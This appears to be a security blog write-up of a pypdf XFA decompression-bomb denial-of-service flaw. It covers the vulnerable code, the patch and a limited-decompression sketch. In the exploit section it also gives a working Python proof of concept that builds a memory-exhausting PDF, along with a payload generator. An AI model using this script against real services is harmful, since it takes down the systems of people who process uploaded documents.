The root cause here isn't some complex heap grooming or race condition. It's a failure of imagination regarding input validation. The vulnerability lives in pypdf/_doc_common.py, specifically in how the library fetches XFA data.

PDFs store XFA forms as streams. To save space, these streams are compressed, usually with FlateDecode (zlib). When you access reader.xfa or writer.xfa, pypdf needs to decompress that stream to give you the XML content.

Here is the logic flaw: the developers assumed that if a stream existed, it should be decompressed in its entirety into a single Python bytes object. There were no guardrails. No checks to ask, "Hey, should this 1MB compressed blob really turn into a 1GB bytes object?"

> [!NOTE]
> In the world of data compression, high ratios are easy to achieve if the data is repetitive. A stream of a billion 'A's compresses to roughly one megabyte, about a thousandth of its original size. If you blindly decompress it, you are handing the attacker a lever to exhaust your server's memory.
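To put a number on "high ratios", here is a quick check with Python's standard zlib module (the 16 MiB payload size is an arbitrary choice for illustration). A single repeated byte gets close to DEFLATE's theoretical ceiling of roughly 1032:1, so every gigabyte an attacker wants you to allocate still costs them about a megabyte of compressed input.

```python
import zlib

# 16 MiB of a single repeated byte: about the most compressible input there is.
payload = b"A" * (16 * 1024 * 1024)
compressed = zlib.compress(payload, 9)

ratio = len(payload) / len(compressed)
print(f"{len(payload):,} bytes -> {len(compressed):,} bytes (about {ratio:.0f}:1)")
```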




CVE-2026-27888

Death by Decompression: Inside the pypdf XFA RAM Exhaustion Exploit

Amit Schendel

Senior Security Researcher

Feb 26, 2026·5 min read

Executive Summary (TL;DR)

pypdf versions prior to 6.7.3 are vulnerable to a Denial of Service attack via the `xfa` property. An attacker can craft a tiny PDF with a highly compressed stream that expands to gigabytes in memory, crashing the Python process.

A resource exhaustion vulnerability in the popular pypdf library allows attackers to crash applications by supplying a malicious PDF. The flaw lies in the handling of XML Forms Architecture (XFA) streams, where a 'zip bomb' technique can trigger unbounded memory allocation.


The Hook: PDFs are just Zip Bombs in a Trench Coat

If you've been in security for more than five minutes, you know that parsing untrusted file formats is the digital equivalent of licking a subway pole. PDFs are particularly egregious offenders. They aren't just documents; they are containers for images, fonts, JavaScript, and—thanks to Adobe's enterprise legacy—XML Forms Architecture (XFA).

pypdf is the go-to pure-Python library for handling these monstrosities. It's used everywhere: from RAG (Retrieval-Augmented Generation) pipelines extracting text for LLMs, to automated invoice processing systems in fintech. It's convenient, easy to install, and usually robust.

But here's the catch: convenience often comes at the cost of safety. In CVE-2026-27888, we find a classic 'zip bomb' vulnerability hiding inside the complex structure of XFA data. An attacker can send you a PDF that looks innocent (maybe 10MB on disk), but when your Python script tries to read its XFA data, it suddenly demands 10GB of RAM. Memory runs out, the OOM killer wakes up, and your service goes dark. It's a beautifully simple Denial of Service.

The Flaw: Trusting the Stream

The Code: The Smoking Gun

Let's look at the code. This is a perfect example of "it works until it doesn't." In versions prior to 6.7.3, the code looked something like this:

# pypdf/_doc_common.py (Vulnerable)
if isinstance(f, IndirectObject):
    field = cast(Optional[EncodedStreamObject], f.get_object())
    if field:
        # The fatal line:
        es = zlib.decompress(field._data)
        retval[tag] = es

See that zlib.decompress(field._data)? That is a loaded gun pointed at your RAM. zlib will happily keep allocating memory until the decompression is finished or your kernel kills the process. It doesn't care that you're running on a t3.micro instance.
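Python's own API offers no ceiling on that call either. zlib.decompress accepts a bufsize argument, but according to the standard library documentation it is only the initial size of the output buffer, which grows as needed. The sketch below contrasts it with zlib.decompressobj().decompress(data, max_length), which does cap the output of each call.

```python
import zlib

original = b"A" * (1024 * 1024)  # 1 MiB of highly compressible input
blob = zlib.compress(original, 9)

# bufsize only sets the starting size of the output buffer; zlib keeps
# growing it until the whole stream is inflated, so it is not a limit.
restored = zlib.decompress(blob, bufsize=1024)

# max_length caps how much one decompress() call returns; compressed input
# that has not been processed yet is kept in unconsumed_tail.
d = zlib.decompressobj()
capped = d.decompress(blob, 1024)

print(len(blob), len(restored), len(capped), len(d.unconsumed_tail))
```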

Now, look at the fix introduced in commit 7a4c8246ed. The maintainers introduced a wrapper that knows when to say "stop."

# pypdf/_doc_common.py (Fixed)
from .filters import _decompress_with_limit  # <--- The Savior
 
if field:
    # Safe decompression:
    es = _decompress_with_limit(field._data)
    retval[tag] = es

The _decompress_with_limit function uses zlib.decompressobj to decompress in chunks, tracking the total output size and raising a LimitReachedError once it exceeds a predefined threshold (configurable via ZLIB_MAX_OUTPUT_LENGTH).
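The pypdf helper itself is not reproduced in this write-up, so what follows is only a minimal sketch of the same chunked-decompression idea. The names decompress_with_limit, LimitReached, max_output and chunk are hypothetical and are not pypdf's API.

```python
import zlib


class LimitReached(Exception):
    """Hypothetical stand-in for pypdf's LimitReachedError."""


def decompress_with_limit(data: bytes, max_output: int, chunk: int = 64 * 1024) -> bytes:
    """Inflate zlib-wrapped data, refusing to produce more than max_output bytes."""
    d = zlib.decompressobj()
    out = bytearray()
    pending = data
    while not d.eof:
        # Ask for at most `chunk` bytes of output per call; input that could
        # not be processed yet is parked in unconsumed_tail.
        piece = d.decompress(pending, chunk)
        pending = d.unconsumed_tail
        out += piece
        if len(out) > max_output:
            raise LimitReached(f"decompressed data exceeds {max_output} bytes")
        if not piece and not pending:
            break  # no input left and no output produced: stream ended early
    if not d.eof:
        raise zlib.error("incomplete or truncated zlib stream")
    return bytes(out)
```

The size check runs after every chunk, so peak memory stays near max_output plus one chunk, however far the stream would otherwise inflate.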

The Exploit: Building the Bomb

Exploiting this is trivial and requires no special tools—just a few lines of Python. We are going to build a valid PDF structure that contains a malicious XFA stream.

Here is the recipe for disaster:

1. Create the payload: we need a highly compressible stream. A gigabyte of zeros or 'A's works perfectly.
2. Compress it: use zlib with the highest compression level (9).
3. Inject it: place this blob, preceded by a packet name, into the /XFA array of the PDF's /AcroForm dictionary.

# The "I hate your RAM" PoC
from pypdf import PdfWriter
from pypdf.generic import NameObject, DictionaryObject, EncodedStreamObject, ArrayObject, TextStringObject
import zlib

# 1. Generate 1GB of 'A's (this consumes RAM on the attacker machine temporarily)
# In a real weaponized script, we'd stream this into the zlib compressor.
payload = b'A' * (1024 * 1024 * 1024)

# 2. Compress it. DEFLATE tops out near 1032:1, so this shrinks to roughly 1 MB.
compressed_data = zlib.compress(payload, level=9)

# 3. Build the PDF structure
writer = PdfWriter()
writer.add_blank_page(width=72, height=72)

# Create the stream object; _data holds the already Flate-encoded bytes
stream = EncodedStreamObject()
stream._data = compressed_data
stream[NameObject("/Filter")] = NameObject("/FlateDecode")

# Attach it to the XFA array. /XFA alternates packet names and streams; the
# vulnerable loop reads (tag, stream) pairs and only decompresses entries that
# are IndirectObjects, so name the packet and register the stream with the writer.
xfa_array = ArrayObject([TextStringObject("template"), writer._add_object(stream)])
acro_form = DictionaryObject()
acro_form[NameObject("/XFA")] = writer._add_object(xfa_array)
writer.root_object[NameObject("/AcroForm")] = writer._add_object(acro_form)

# 4. Save the bomb
with open("memory_nuke.pdf", "wb") as f:
    writer.write(f)
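The comment in step 1 notes that a weaponized script would stream the payload into the compressor instead of allocating it up front. Here is a minimal sketch of that idea using zlib.compressobj. flate_bomb is a hypothetical helper name, and it assumes a single-byte fill value.

```python
import zlib


def flate_bomb(total_size: int, fill: bytes = b"A", chunk_size: int = 1024 * 1024) -> bytes:
    """Return zlib data that inflates to total_size copies of a single byte.

    The payload is fed to the compressor one chunk at a time, so the
    attacker-side process never holds the full expanded payload in memory.
    """
    if len(fill) != 1:
        raise ValueError("fill must be a single byte")
    compressor = zlib.compressobj(level=9)
    chunk = fill * chunk_size
    parts = []
    remaining = total_size
    while remaining > 0:
        n = min(chunk_size, remaining)
        parts.append(compressor.compress(chunk[:n]))
        remaining -= n
    parts.append(compressor.flush())  # emit the final block and checksum
    return b"".join(parts)
```

In the PoC above, compressed_data = flate_bomb(1024 * 1024 * 1024) could stand in for steps 1 and 2, keeping the attacker's peak memory near one chunk.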

Now, send memory_nuke.pdf to any service that uses a vulnerable pypdf version to inspect uploaded documents. As soon as it accesses the xfa property... BOOM. The process hangs, memory usage spikes vertically, and the service dies.

The Impact: Why automation is dangerous

Why is this a big deal? Because we automate everything. Modern document processing pipelines often accept uploads from the public internet (resumes, invoices, legal forms). These pipelines often run in memory-constrained environments like AWS Lambda or Kubernetes pods.

If your application reads the xfa property, for instance while checking for form fields or extracting every piece of document data for indexing, a single malicious user can take down your worker nodes. Whether a helper such as reader.get_form_text_fields() reaches XFA data internally depends on the code path in your pypdf version, so audit your own call sites.

This isn't just a crash; in a shared hosting environment or a poorly isolated container, this memory pressure can affect other neighbors or lock up the host system entirely. It's a low-effort, high-impact asymmetric attack.

Official Patches

pypdf: Release notes for version 6.7.3


Technical Appendix

CVSS Score

6.6 / 10

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U
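After the CVSS:4.0 prefix, the vector is a slash-separated list of metric:value pairs. The sketch below splits it apart; parse_cvss_v4 is a hypothetical helper, not part of any CVSS library. The split shows a network-reachable attack (AV:N) with low complexity (AC:L) and no privileges or user interaction required (PR:N, UI:N). The only impact is high availability loss on the vulnerable system (VA:H), and E:U records exploit maturity as Unreported.

```python
def parse_cvss_v4(vector: str) -> dict:
    """Split a CVSS v4.0 vector string into a {metric: value} mapping."""
    prefix, *metrics = vector.split("/")
    if prefix != "CVSS:4.0":
        raise ValueError(f"not a CVSS v4.0 vector: {prefix!r}")
    return dict(metric.split(":", 1) for metric in metrics)


vector = "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"
metrics = parse_cvss_v4(vector)

# Impact metrics for the vulnerable (V*) and subsequent (S*) systems
impact_keys = ("VC", "VI", "VA", "SC", "SI", "SA")
impacted = {k: metrics[k] for k in impact_keys if metrics[k] != "N"}
print(impacted)  # {'VA': 'H'}
```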

EPSS Probability

0.04%

Top 87% most exploited

Affected Systems

pypdf < 6.7.3
Python applications processing untrusted PDFs
RAG pipelines using pypdf for extraction

Affected Versions Detail

Product	Affected Versions	Fixed Version
pypdf py-pdf	< 6.7.3	6.7.3

Attribute	Detail
CWE ID	CWE-400 (Uncontrolled Resource Consumption)
CVSS v4.0	6.6 (Medium)
Attack Vector	Network / Local
Exploit Status	PoC Available
Impact	Denial of Service (DoS)
Affected Component	pypdf.PdfReader.xfa

MITRE ATT&CK Mapping

T1499.004 Endpoint Denial of Service: Application or System Exploitation

Impact

CWE-400

Uncontrolled Resource Consumption

Known Exploits & Detection

pypdf Repository: Unit test demonstrating the exhaustion logic

Vulnerability Timeline

Vulnerability identified and fix merged

2026-02-24

pypdf 6.7.3 Released

2026-02-24

CVE Published

2026-02-26
